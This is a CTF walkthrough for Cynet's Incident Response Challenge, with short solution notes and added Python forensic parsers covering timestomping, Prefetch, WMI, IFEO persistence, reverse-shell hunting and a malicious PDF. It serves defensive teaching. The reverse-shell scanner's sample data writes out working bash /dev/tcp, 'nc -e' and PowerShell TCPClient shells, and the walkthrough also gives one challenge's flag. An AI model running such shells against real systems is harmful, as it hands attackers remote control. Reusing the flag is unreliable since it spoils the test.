
Cynet - The Incident Response Challenge: Solution Walkthrough

2020-06-09 15:37 Author: 合天网安实验室

PS: These notes only record the process and are not necessarily correct.

Official site: https://incident-response-challenge.com/


Part 1: Basic

1. Time Machine

https://incident-response-challenge.com/challenges/1

Challenge description:

Story

GOT Ltd CTO claimed that he found out suspicious activity on his laptop.

He stated that some of his files suddenly moved from one location to another, when other files seem to be modified on illogical dates. He asked us to check if we can find anomaly indicators which are relevant to his desktop files.

We found out that he was right and there is clear indication of anomaly, using a well-known technique. Try to examine the following $MFT file, focusing on the CTO’s Desktop files.

Can you find the anomaly, which is relevant to the time in which file’s changes/modifications have been made, based on the provided $MFT File?

Instructions

Submit the name of the file that has been found to be affected by the attacker and its original creation time.

The file is located directly on the Desktop.

Time Format: DD-MM-YYYY HH:MM:SS

Filename Format: filename.ext (ext stands for a 3-letter file extension)


wp: Open the downloaded $MFT file with mft2csv and locate the file.
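The anomaly this challenge points at is timestomping, and the standard way to spot it in an $MFT export is to compare the $STANDARD_INFORMATION (SI) timestamps, which most tools let a user rewrite, with the $FILE_NAME (FN) timestamps, which are maintained by the kernel. Two signals are worth checking: an SI creation time earlier than the FN creation time, and SI timestamps with an all-zero sub-second part while FN keeps NTFS 100-ns precision. The following is an added example, not code from the original post or from the challenge; it runs over constructed rows in the shape of an mft2csv-style export (the paths and times are invented) and reports the FN creation time in the challenge's answer format.

```python
from datetime import datetime

# Constructed sample rows in the shape of an mft2csv-style export (not the challenge's data).
# SI_* = $STANDARD_INFORMATION timestamps, FN_* = $FILE_NAME timestamps, all UTC,
# written with NTFS 100-nanosecond precision.
SAMPLE_ROWS = [
    {"path": r"Users\cto\Desktop\report.pdf",          # untouched file: SI == FN
     "SI_created": "2020-01-15 09:12:33.1234567",
     "FN_created": "2020-01-15 09:12:33.1234567"},
    {"path": r"Users\cto\Desktop\budget.xls",          # backdated: SI < FN, whole seconds only
     "SI_created": "2015-03-01 10:00:00.0000000",
     "FN_created": "2020-02-02 14:21:07.4412009"},
    {"path": r"Users\cto\Desktop\notes.txt",           # renamed/moved file: FN copied from SI, no anomaly
     "SI_created": "2019-11-30 08:05:12.0009871",
     "FN_created": "2019-11-30 08:05:12.0009871"},
    {"path": r"Users\cto\Documents\old.doc",           # backdated, but outside the Desktop scope
     "SI_created": "2010-01-01 00:00:00.0000000",
     "FN_created": "2020-02-02 14:25:40.2210000"},
]


def parse_ntfs_timestamp(value):
    """Split 'YYYY-MM-DD HH:MM:SS.fffffff' into (datetime, 100-ns ticks)."""
    base, _, frac = value.partition(".")
    dt = datetime.strptime(base, "%Y-%m-%d %H:%M:%S")
    ticks = int(frac.ljust(7, "0")[:7]) if frac else 0
    return dt, ticks


def find_timestomp_indicators(rows, desktop_only=True):
    """Return rows whose $STANDARD_INFORMATION creation time looks tampered with."""
    findings = []
    for row in rows:
        if desktop_only and "\\Desktop\\" not in row["path"]:
            continue
        si_dt, si_ticks = parse_ntfs_timestamp(row["SI_created"])
        fn_dt, fn_ticks = parse_ntfs_timestamp(row["FN_created"])
        reasons = []
        # FN is set by the kernel at creation/rename; SI being older than FN cannot
        # happen through normal file operations.
        if (si_dt, si_ticks) < (fn_dt, fn_ticks):
            reasons.append("SI creation earlier than FN creation")
        # Tools that rewrite SI often work at one-second granularity.
        if si_ticks == 0 and fn_ticks != 0:
            reasons.append("SI creation has no sub-second part")
        if reasons:
            findings.append({
                "path": row["path"],
                # FN creation is the best available estimate of the original time,
                # formatted as the challenge asks (DD-MM-YYYY HH:MM:SS).
                "original_created": fn_dt.strftime("%d-%m-%Y %H:%M:%S"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for hit in find_timestomp_indicators(SAMPLE_ROWS):
        print(hit["path"], hit["original_created"], "; ".join(hit["reasons"]))
```

Keep in mind that a file moved between volumes or restored from backup gets fresh FN timestamps, so the SI-before-FN rule is an indicator to corroborate with $LogFile or $UsnJrnl entries rather than a verdict on its own.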

2. Hello Dok

https://incident-response-challenge.com/challenges/2

Challenge description:

Story

Podrick claims that last Monday (February 3, 2020), at lunch time (around 12:00 PM) a USB device of a malicious entity was plugged into his personal computer. He has also mentioned that he saw one of his colleagues – Theon G, leaving his (Podrick’s) office with the USB in his hand.

Theon claims that he entered the office to visit Aria (who sits in the same office). When he saw Aria was not there, he left the office immediately.

Podrick regularly doesn’t lock his computer and suspects that Theon took advantage of this to steal some of his personal data.

We were invited to examine Podrick’s PC.

Was a USB Device connected to Podrick’s PC on February 3, 2020?

Instructions

Submit the Serial/UID of the suspected USB device


wp: The downloaded files are registry hives. Analyze the SYSTEM hive and find the USB record closest to 12:00.

3. Bling-Bling

Story

Lord Varys, director of the finance department in GOT-Research Ltd, found out that certain information about the senior employees’ salaries were leaked and reached other employees of the organization. This financial information is saved on a network shared folder. Permissions to this network folder have been given to Lord Petyr Baelish, and 2 former employees: John Snow, and Daenerys Targaryen. Both John and Daenerys work as external consultants to GOT and aren’t part of the finance department anymore.

Their permissions to the finance shared folders haven’t been revoked yet. Petyr Baelish, John, and Daenerys were never in a good relationship, and Varys suspects them as the cause of the leak. He assumes that one of them wanted to hurt his name and make people think that he leaked the information.

GOT-Research CEO asked John and Daenerys about the mentioned event, when both claimed that they didn’t access the finance folder for almost a year (since leaving the finance department).

Important Information:

To examine if John or Daenerys have accessed the financial data, which includes that Management-Salaries.xlsx file that contains the data which has been leaked.

GOT invited us to investigate the Consultants’ PC.

Instructions

Submit the main suspect’s first name + filename of the suspicious finance file, found on the suspect's host.

Filename Format:File-Name.ext


wp: The downloaded files are Jump List records; analyze them with the JumpList Explorer tool.


4. Is that you?

Story

We were asked to come as soon as possible to GOT Ltd. main site in Japan to investigate their Windows Server 2012 R2 – Domain Controller.

The organizational security experts claimed that lately the server has crashed a few times and that other errors have also occurred frequently. Their attempts to find a reasonable explanation have failed and they suspect that malicious activity on this server has been taking place.

To investigate this issue, Podrick, GOT Ltd. VP invited us as DFIR experts.

As the first step in the investigation, before our arrival in Japan, GOT Ltd. sent us a raw memory dump which has been taken from the Domain Controller at 17:40. The organizational security experts have noticed that the server crashes have occurred each time around 17:45 and tried to get the best raw memory they could for our investigation.

Can you recognize the suspected process in memory?

Instructions

Submit the PID and PPID of the suspected process

PID: 3-4 Decimal Digits value

PPID: 3-4 Decimal Digits value


wp: The download is a memory dump; go straight to Volatility and look for the process.


5. B4 Catch

Story

Aria, Head of Security and IT at GOT Ltd. noticed some suspicious SIEM alerts. The alerts mentioned a suspicious file named Scvhost.exe which has been recognized on some organizational hosts. Right as she started to examine this issue, the files were deleted from the hosts.

Aria suspects that Scvhost.exe is a malicious file (probably some kind of malware) and that the attacker is currently in the organizational network.

GOT Ltd management wants us to determine if the Scvhost.exe has been executed on the organizational hosts, when the execution occurred, and how it was deleted.

Instructions

Submit the last execution time of the suspicious file + number of executions on the examined host.

Time Format: DD-MM-YYYY HH:MM (no seconds)


wp: Prefetch file analysis

(Prefetch, introduced in Windows XP, speeds up application startup. A Prefetch file contains the executable's name, file timestamps, run count, last execution time, hash, and so on. Windows 7 keeps records for the last 128 executables; Windows 8 through 10 keep the last 1024.)

Use the helper tool PECmd

https://github.com/EricZimmerman/PECmd
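PECmd does this for you, but it helps to know which header fields the answer comes from. The executable name, the last-run FILETIME(s) and the run counter sit at fixed offsets that depend on the format version at offset 0 (17 for XP, 23 for Windows 7, 26 for Windows 8/8.1). The following is an added example, not code from the original post or from the PECmd project; it builds a constructed Windows 8-style Prefetch header (only the fields it reads are populated, the name and times are invented) and parses it back, formatting the result the way the challenge wants the answer. Windows 10 Prefetch files start with "MAM" and are LZXPRESS-Huffman compressed, so they must be decompressed before a parser like this can read them.

```python
import struct
from datetime import datetime, timedelta

FILETIME_EPOCH = datetime(1601, 1, 1)
SIGNATURE = b"SCCA"
# Version-specific offsets (from the start of the uncompressed file) of the
# last-run FILETIME slot(s) and the 32-bit run counter.
LAYOUT = {
    17: {"last_run": 0x78, "last_run_count": 1, "run_count": 0x90},   # Windows XP
    23: {"last_run": 0x80, "last_run_count": 1, "run_count": 0x98},   # Windows 7
    26: {"last_run": 0x80, "last_run_count": 8, "run_count": 0xD0},   # Windows 8/8.1
}


def filetime_to_datetime(ft):
    """FILETIME = 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def is_compressed(data):
    """Windows 10 writes MAM-compressed Prefetch files that need decompression first."""
    return data[:3] == b"MAM"


def parse_prefetch(data):
    """Return executable name, hash, run count and last-run times from a Prefetch file."""
    if is_compressed(data):
        raise ValueError("compressed (Windows 10) Prefetch: decompress before parsing")
    if data[0x04:0x08] != SIGNATURE:
        raise ValueError("not a Prefetch file (missing SCCA signature)")
    version = struct.unpack_from("<I", data, 0x00)[0]
    if version not in LAYOUT:
        raise ValueError(f"unsupported Prefetch version {version}")
    layout = LAYOUT[version]
    # Executable name: 60 bytes of UTF-16LE at 0x10, NUL terminated.
    name = data[0x10:0x10 + 60].decode("utf-16-le").split("\x00", 1)[0]
    prefetch_hash = struct.unpack_from("<I", data, 0x4C)[0]
    run_times = []
    for i in range(layout["last_run_count"]):
        ft = struct.unpack_from("<Q", data, layout["last_run"] + 8 * i)[0]
        if ft:  # unused slots are zero
            run_times.append(filetime_to_datetime(ft))
    run_count = struct.unpack_from("<I", data, layout["run_count"])[0]
    return {"version": version, "exe_name": name, "hash": prefetch_hash,
            "run_count": run_count, "last_runs": run_times}


def build_sample_prefetch(version, exe_name, run_times, run_count):
    """Constructed fixture: only the header fields read above are populated."""
    layout = LAYOUT[version]
    buf = bytearray(0x100)
    struct.pack_into("<I", buf, 0x00, version)
    buf[0x04:0x08] = SIGNATURE
    struct.pack_into("<I", buf, 0x0C, len(buf))
    buf[0x10:0x10 + 60] = exe_name.encode("utf-16-le").ljust(60, b"\x00")
    struct.pack_into("<I", buf, 0x4C, 0x12345678)  # placeholder hash value
    for i, dt in enumerate(run_times):
        struct.pack_into("<Q", buf, layout["last_run"] + 8 * i, datetime_to_filetime(dt))
    struct.pack_into("<I", buf, layout["run_count"], run_count)
    return bytes(buf)


def summarize(data):
    """One line in the challenge's format: name, run count, last run as DD-MM-YYYY HH:MM."""
    info = parse_prefetch(data)
    latest = max(info["last_runs"]).strftime("%d-%m-%Y %H:%M") if info["last_runs"] else "never"
    return f'{info["exe_name"]}: run {info["run_count"]} times, last run {latest}'


# Constructed sample: an invented executable name and invented run times.
SAMPLE_PREFETCH = build_sample_prefetch(
    26, "SCVHOST.EXE",
    [datetime(2020, 2, 3, 12, 31, 0), datetime(2020, 2, 1, 9, 0, 0)], run_count=2)

if __name__ == "__main__":
    print(summarize(SAMPLE_PREFETCH))
```

The eight last-run slots kept since Windows 8 are the reason a single Prefetch file can show several execution times; the answer the challenge asks for is the newest of them, while the run counter is the total since the file was first created.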

6. Titan

Story

The Master of Whispers has ears everywhere.

The kingdom has decided it is time to do something about it.

We are going from server to server to find his little birds who keep talking, repeatedly.

This Ubuntu server has been suspected to be compromised.

We need to know the IP of the listener.

Instructions

Submit the IP of the malicious C2


wp: The download is an Ubuntu disk image; look directly at the crontab logs and execution records.


7. Sports

Story

Sansa went on a trip to The Eyrie.

Upon her return she seems to be feeling unwell. We think she has been infected with a bug.

When she wakes up, she starts coughing up commercials for Anti-Marriage campaigns.

Please look at her profile and see what the issue is.

Instructions

Submit the malicious file executed using the persistence mechanism on the station:

Filename Format: filename.ext (ext stands for a 3 letter file extension)


wp: The download is the contents of the C: drive. It contains hive files; load them into a registry analysis tool.

Then just find the registry value under the Run key.

8. LNK Files

Story

Someone has been spreading rumors about how much everyone makes in the kingdom. Upon further investigation we found that the salaries file accidentally had its permissions set to everyone.

Sansa believes that someone is Littlefinger.

We need to find evidence that he had accessed the salaries file.

This way we can finally have leverage against him.

Instructions

Submit the flag located in the same artifact source as the evidence against Littlefinger:


wp: Look for LNK files using the keyword "salaries"; find the one that links to a share. Alternatively, analyzing the Jump List also works.

Part 2: Medium

1. Can’t touch this

Story

Podrick was satisfied with our first investigation, in which we proved that Theon has probably plugged his USB device into Podrick’s PC when he was away.

As we remember, we proved that someone (Theon) plugged a USB device to Podrick’s PC on February 3, 2020 – around 12 PM (12:15-12:45 PM according to our findings of Suspicious USB usage – Hello DOK).

Podrick claims that some of his files/directories have changed; he thinks that the changes have also been made by Theon on his first access to his machine, which we have already proved as probably having happened. He wants us to find out which files were changed/touched by Theon, focusing on the Projects folder which according to Podrick has been completely emptied.

We said that we would do our best and continue with our investigation, to find which files have been watched/copied by Theon.

Instructions

Submit the time in which the “Projects” folder was recreated by Theon.

Note: it is recommended you solve Challenge No.2 before starting this challenge.

Time Format: HH:MM:SS


wp: This is the upgraded version of Hello DoK; that one must be completed first.

The download contains a pile of log files and hive files. Analyzing the log files for a long time led nowhere; in the end I noticed that the name of the downloaded folder hints at ShellBags.

Then load the hive file in a ShellBags analysis tool and you can find it.

2. Copy PaSTe

Story

Theon, one of GOT Ltd. Employees has been fired due to many disciplinary issues.

Theon was a member of the Help-Desk team and supported the company employees on the following aspects:

  • Computing hardware problems

  • Software installations

  • Email support

Theon’s hearing before dismissal took place on February 5, 2020. And he was officially fired on February 8, 2020.

Right after Theon’s dismissal, some private emails of GOT’s CEO (John Snow) and VP (Daenerys) have been published.

Theon claims that he has nothing to do with that.

Varys, Theon’s former boss, claims that Theon didn’t have any access to the CEO’s and VP’s emails. But he also suggested giving us Theon’s PC, which hasn’t yet been formatted, for us to investigate.

Varys already checked Theon’s Desktop and said that it’s totally empty, which means that Theon has probably moved/deleted some files.

Can you find the specific file that has been deleted/moved which can indicate that Theon had access to John’s (CEO) E-Mail data?

Instructions

Submit the name of the moved/deleted file that can indicate Theon had access to John’s E-Mail data.

Filename Format: filename.ext


wp: The downloaded files are these:


Find a tool to analyze them.


3. WhoaMI

Story

The SOC analysts of the GOT organization reported that they have found some anomalies. The analysts assume that the attacker still exists on the organization but can’t find any backdoor signs.

They asked us for help and sent us the disk image copy to investigate.

The head of the SOC team stated that according to his observation there has been massive PowerShell and CMD usage throughout the organization, including in hosts which are not being used by technical employees.

One of the most suspicious hosts is Lady Brienne’s host. Brienne (GOT's accountant) stated that she has never used PowerShell or CMD, while the SOC team stated that her machine is probably the “noisiest” in the last few days.

Can you find the backdoor technique which has been used by the attacker on Lady Brienne’s PC?

Instructions

Submit the full path of the file executed by the persistence mechanism.

Full path Format: C:\path\to\malicious\file.ext


wp: WMI forensics

Run strings on the OBJECTS.DATA file and search for the keyword powershell.exe.

References: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

http://index-of.es/Forensic/DEFCON-23-WMI-Attacks-Defense-Forensics.pdf
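The WMI repository (OBJECTS.DATA) stores filter, consumer and binding objects for permanent event subscriptions, and a strings scan is a quick way to surface a CommandLineEventConsumer that launches powershell.exe. One practical point: a scan that only covers 8-bit strings can miss UTF-16LE values, so the scan should cover both encodings (the equivalent of running strings with and without -el). The following is an added example, not code from the original post; the blob it scans is constructed, and the path in it is a placeholder rather than a real indicator.

```python
import re

# Constructed sample: an OBJECTS.DATA-like blob mixing binary noise, an 8-bit class
# name, a UTF-16LE command line and a UTF-16LE WQL query. Not real repository data.
SAMPLE_BLOB = (
    b"\x00\x01\x02\x03" * 8
    + b"CommandLineEventConsumer"
    + b"\xff\xfe\x00\x00" * 4
    + "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\sample.ps1".encode("utf-16-le")
    + b"\x00" * 8
    + b"__EventFilter"
    + b"\x07\x00\x00\x00"
    + "SELECT * FROM __InstanceModificationEvent WITHIN 60".encode("utf-16-le")
)

# Class names and script hosts that typically show up in a WMI persistence triad.
WMI_KEYWORDS = ("powershell.exe", "cmd.exe", "wscript", "CommandLineEventConsumer",
                "ActiveScriptEventConsumer", "__EventFilter", "__FilterToConsumerBinding")


def extract_strings(data, min_len=6):
    """Return (offset, encoding, text) for printable runs in 8-bit and UTF-16LE form."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_re.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
              for m in utf16_re.finditer(data)]
    return sorted(found)


def find_wmi_indicators(data, keywords=WMI_KEYWORDS, min_len=6):
    """Strings that mention WMI event-subscription classes or script hosts."""
    hits = []
    for offset, enc, text in extract_strings(data, min_len):
        if any(k.lower() in text.lower() for k in keywords):
            hits.append({"offset": offset, "encoding": enc, "text": text})
    return hits


if __name__ == "__main__":
    # On a real image: data = open("OBJECTS.DATA", "rb").read()
    for hit in find_wmi_indicators(SAMPLE_BLOB):
        print(f'{hit["offset"]:#08x} {hit["encoding"]:8} {hit["text"]}')
```

The offsets let you go back to the surrounding bytes to see which consumer the command line belongs to; for a structured parse of the repository rather than a strings pass, the FireEye paper referenced above describes the object layout.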

4. Kiwi

Story

Jaime, known as the King-Slayer is head of HR in GOT Ltd. He recognized, or at least thinks that he recognized, some suspicious activity on his PC.

Yesterday – February 8, 2020, around 15:00, he recognized a file with a kiwi logo appeared on his desktop. According to him, the file suddenly disappeared not long after its first appearance on his desktop. Later that day, he started getting messages saying he needs to re-activate Windows Defender. He activated Windows Defender and got the same message again a few hours later.

King-Slayer decided to tell this to his friend in the IT department – Chris. When Chris heard the story, he reported it immediately to the Cyber Security department of GOT Ltd.

The organization’s CISO didn’t want to waste time and called us right away.

GOT Ltd main office is in Switzerland. The CISO sent us all the event logs from King-Slayer’s PC and from the Domain Controller.

Can you help us to find the relevant anomaly?

  • Jaime’s user account (KingSlayer) is Local Admin on his host.

  • Domain Name -> GOT.Com

  • DC Server name -> WIN-IL7M7CC6UVU

  • Jaime (King Slayer) host -> DESKTOP-HUB666E (172.16.44.135)

Instructions

Submit the domain user account which the attacker used (other than King-Slayer) and the IP Address of the host which he accessed using this user account.


wp: Domain forensics. Log auditing; pass-the-hash attack.

Audit the Security.evtx log file.


5. Seashell

Story

The great web server has been showing signs of weird activity lately.

Some weird cronjobs have been created and there has been some unexpected outgoing traffic.

We think maybe someone has gained access to the server.

The cronjobs were created using a web-server user. We suspect someone managed to create a backdoor using the website itself.

Instructions

Find the flag in the reverse shell.


wp: The downloaded files come from a pfSense firewall. Linux system; keyword hints: webshell, crawler.

Following the hints, search all strings directly to find the reverse shell. Searching for the keyword bash is enough.


6. Sneak

Story

The Army of the North believes it might have a spy amongst them.

They have clear indication that the enemy anticipates their movement.

We must find the suspicious process that keeps sending data outside.

Instructions

Find the suspicious process name.

Process Name Format: Process.exe


wp: The download is a memory dump.

Try Volatility forensics and look for the suspicious process.

The image information could not be detected by scanning, so the profile had to be specified manually; it was finally determined to be Windows 10 x64 build 15063.


7. Universal

Story

We have been getting reports from a concerned user about unusual behavior on his workstation. CMD windows occasionally pop up, and sometimes the station is reset.

The behavior seems to persist after these restarts.

We believe some malicious software has implemented a persistence mechanism, but our team has not been able to find it so far.

Instructions

Submit the persistent process

Process Name Format: Process.exe


wp: Key hint: GlobalFlag

Find the registry entry with Registry Explorer; searching for the GlobalFlag registry key is enough.


Reference: Image File Execution Options Injection, Technique T1183 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/techniques/T1183/
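The GlobalFlag hint refers to the SilentProcessExit variant of IFEO persistence: setting GlobalFlag to 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT) under Image File Execution Options\<target.exe>, together with a SilentProcessExit\<target.exe> key whose MonitorProcess value names the program Windows launches whenever the target exits. The classic IFEO Debugger value is the older form of the same technique; MITRE has since folded T1183 into T1546.012. The following is an added example, not code from the original post; it parses a constructed regedit-style export (placeholder paths, not real indicators) and correlates the two keys so that the monitored executable, which is the answer this challenge asks for, comes out directly.

```python
import re

# Constructed .reg-style export (not a real hive); paths under Users\Public are placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\Users\\Public\\sample.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"Debugger"="C:\\Users\\Public\\other.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe]
"GlobalFlag"=dword:00000002
"""

FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200
IFEO = "\\Image File Execution Options\\"
SPE = "\\SilentProcessExit\\"
KEY_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")\s*$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} from regedit-style export text.

    Only DWORD and string values are handled; regedit doubles backslashes in strings.
    Files written by regedit are UTF-16LE, so read them with encoding="utf-16".
    """
    keys, current = {}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, _, dword, string = m.groups()
            keys[current][name] = (int(dword, 16) if dword is not None
                                   else string.replace("\\\\", "\\"))
    return keys


def find_ifeo_persistence(keys):
    """Flag Debugger hijacks and SilentProcessExit monitors under IFEO subkeys."""
    findings = []
    for path, values in keys.items():
        idx = path.find(IFEO)
        if idx < 0:
            continue
        target = path[idx + len(IFEO):]
        if "Debugger" in values:
            findings.append({"target": target, "technique": "IFEO Debugger",
                             "payload": values["Debugger"]})
        if values.get("GlobalFlag", 0) & FLG_MONITOR_SILENT_PROCESS_EXIT:
            # The monitor process lives under the sibling SilentProcessExit key.
            spe = keys.get(path[:idx] + SPE + target, {})
            findings.append({"target": target, "technique": "SilentProcessExit monitor",
                             "payload": spe.get("MonitorProcess"),
                             "reporting_mode": spe.get("ReportingMode")})
    return findings


if __name__ == "__main__":
    for f in find_ifeo_persistence(parse_reg_export(SAMPLE_REG)):
        print(f'{f["technique"]:26} {f["target"]:14} -> {f["payload"]}')
```

A GlobalFlag value without the 0x200 bit (the chrome.exe entry above) is an ordinary GFlags setting and is not reported; the bit test is what separates debugging configuration from the persistence trick.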

8. Notes

Story

An attacker has gained access to Littlefinger’s session on his computer.

He has successfully connected to Kings Landing (DC) using the GOT\varys-adm of the IT team Domain Admin account credentials.

It is yet unclear how he found those credentials.

We suspect it to be the entry point of the attacker to the whole organization.

Instructions

Submit the Varys-adm user password.


wp: Key hint: BMCache

Find the RDP bitmap cache files.

Find a tool to parse them and recover the password.


9. Psss

Story

Same old story.

The master of whispers has ears everywhere.

Cersei is paranoid…

We have another station which might be compromised.

Help us find the IP of the listening C2 server.

Instructions

Submit the IP of the reverse shell server.


wp: The download is a VHDX image; mount it and recover the log files.

Find the PowerShell execution records.

Key hint: PowerShell
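Titan, Seashell and this challenge all reduce to the same hunt: find the reverse shell command (in a crontab, in strings from a web server or in PowerShell script-block logs) and read the listener's address out of it. The following is an added example, not code from the original post; it scans text lines for the common reverse-shell idioms (bash /dev/tcp redirection, netcat with -e, PowerShell TCPClient), extracts the IP and port, and ranks candidate C2 endpoints by how often they recur, which is what the repeated cron beaconing in Titan looks like. The sample lines are constructed and use TEST-NET addresses; none comes from the challenge files.

```python
import re
from collections import Counter

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Each pattern captures group 1 = IP, group 2 = port.
PATTERNS = {
    "bash /dev/tcp redirect": re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/(\d{1,5})"),
    "netcat with -e": re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*?-e\b[^\n]*?" + IPV4 + r"\s+(\d{1,5})"),
    "PowerShell TCPClient": re.compile(r"TCPClient\(\s*['\"]?" + IPV4 + r"['\"]?\s*,\s*(\d{1,5})",
                                       re.IGNORECASE),
}

# Constructed sample lines in the shape of a crontab, a shell history and a
# PowerShell script-block log. Addresses are TEST-NET ranges, not real C2.
SAMPLE_LINES = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update -q",
    "*/5 * * * * bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "ls -la /var/www/html",
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "nc -zv 198.51.100.9 80",                      # port check, no -e: not flagged
    '$client = New-Object System.Net.Sockets.TCPClient("192.0.2.55", 443)',
    "nc -e /bin/sh 198.51.100.8 4444",
]


def scan_for_reverse_shells(lines):
    """Return one finding per line that matches a reverse-shell idiom."""
    findings = []
    for num, line in enumerate(lines, 1):
        for name, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append({"line": num, "pattern": name,
                                 "ip": m.group(1), "port": int(m.group(2))})
    return findings


def candidate_c2(lines):
    """Distinct (ip, port) pairs, most frequently seen first (cron beacons recur)."""
    counts = Counter((f["ip"], f["port"]) for f in scan_for_reverse_shells(lines))
    return [pair for pair, _ in counts.most_common()]


if __name__ == "__main__":
    # On a real image: lines = open("/var/spool/cron/crontabs/www-data").read().splitlines()
    for f in scan_for_reverse_shells(SAMPLE_LINES):
        print(f'line {f["line"]:3} {f["pattern"]:24} {f["ip"]}:{f["port"]}')
    print("candidate C2:", candidate_c2(SAMPLE_LINES))
```

The patterns are deliberately narrow so they can be read and extended; encoded PowerShell (-EncodedCommand) needs a base64/UTF-16 decode pass before this scan sees anything, and the script-block log (event 4104) usually carries the decoded form.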


10. Roots

Story

We have found the following pdf running around our infrastructure.

It clearly has legs.

We believe the attacker has hidden a password to one of his services in the code and we need that password.

Instructions

In the PDF there is a word file and in the word file there is a macro that contains the flag in ascii.


wp: According to the hint, analyze the malicious PDF file; the PDF contains a Word file, and the Word file contains a macro.

Try pdf-parser on Kali.


Inside there is code that downloads a PowerShell script from GitHub; find that script and you find the password.

FlaG_[W0N-C0NGr@T5]
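pdf-parser does the heavy lifting here, but the structure it exposes is simple enough to walk by hand: every stream object carries a dictionary, an /EmbeddedFile stream is the attachment, and /FlateDecode means the body is zlib-compressed. The following is an added example, not code from the original post or from the pdf-parser project; it builds a constructed minimal PDF with one FlateDecode /EmbeddedFile stream holding a constructed macro-enabled OOXML skeleton (a zip with a placeholder word/vbaProject.bin, no real VBA), then extracts the attachment and classifies it. Nested dictionaries, object streams and filters other than FlateDecode are not handled; for real samples use pdf-parser, and extract the macro itself with oletools' olevba.

```python
import io
import re
import zipfile
import zlib

# "N G obj << ... >> stream" where the dictionary does not cross an endobj keyword.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(<<(?:(?!endobj).)*?>>)\s*stream\r?\n", re.DOTALL)
# Direct /Length only; "/Length 5 0 R" (indirect) is skipped by the lookahead.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")


def extract_streams(pdf):
    """Yield (object number, dictionary bytes, decoded stream bytes) for each stream."""
    for m in OBJ_RE.finditer(pdf):
        num, dictionary = int(m.group(1)), m.group(3)
        lm = LENGTH_RE.search(dictionary)
        if lm:
            raw = pdf[m.end(): m.end() + int(lm.group(1))]
        else:  # indirect /Length: fall back to the endstream keyword
            raw = pdf[m.end(): pdf.index(b"endstream", m.end())].rstrip(b"\r\n")
        data = zlib.decompress(raw) if b"/FlateDecode" in dictionary else raw
        yield num, dictionary, data


def classify(data):
    """Identify an extracted attachment by its magic bytes and (for OOXML) its members."""
    if data[:4] == b"\xD0\xCF\x11\xE0":
        return "OLE2 compound file (legacy .doc/.xls; inspect with oletools)"
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return "zip-like, unreadable"
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            return "OOXML document with VBA project (macro-enabled)"
        return "OOXML document without VBA project"
    return "other"


def find_embedded_files(pdf):
    """List /EmbeddedFile streams with their size and a classification."""
    return [{"object": num, "size": len(data), "kind": classify(data)}
            for num, dictionary, data in extract_streams(pdf)
            if b"/EmbeddedFile" in dictionary]


def build_sample_docm():
    """Constructed OOXML skeleton with a placeholder vbaProject.bin (no real macro)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"placeholder bytes, not a real VBA project")
    return buf.getvalue()


def build_sample_pdf(embedded):
    """Constructed minimal PDF carrying one FlateDecode /EmbeddedFile stream (no xref table)."""
    body = zlib.compress(embedded)
    return (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length "
        + str(len(body)).encode() + b" >>\nstream\n" + body + b"\nendstream\nendobj\n"
        b"4 0 obj << /Type /Filespec /F (invoice.docm) /EF << /F 3 0 R >> >> endobj\n"
    )


SAMPLE_PDF = build_sample_pdf(build_sample_docm())

if __name__ == "__main__":
    # On a real sample: pdf = open("suspect.pdf", "rb").read()
    for item in find_embedded_files(SAMPLE_PDF):
        print(item)
```

Reading the stream by its declared /Length rather than searching for "endstream" matters because compressed bodies can contain that keyword by chance; the fallback is only used when the length is an indirect reference.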

Part 3: Advanced
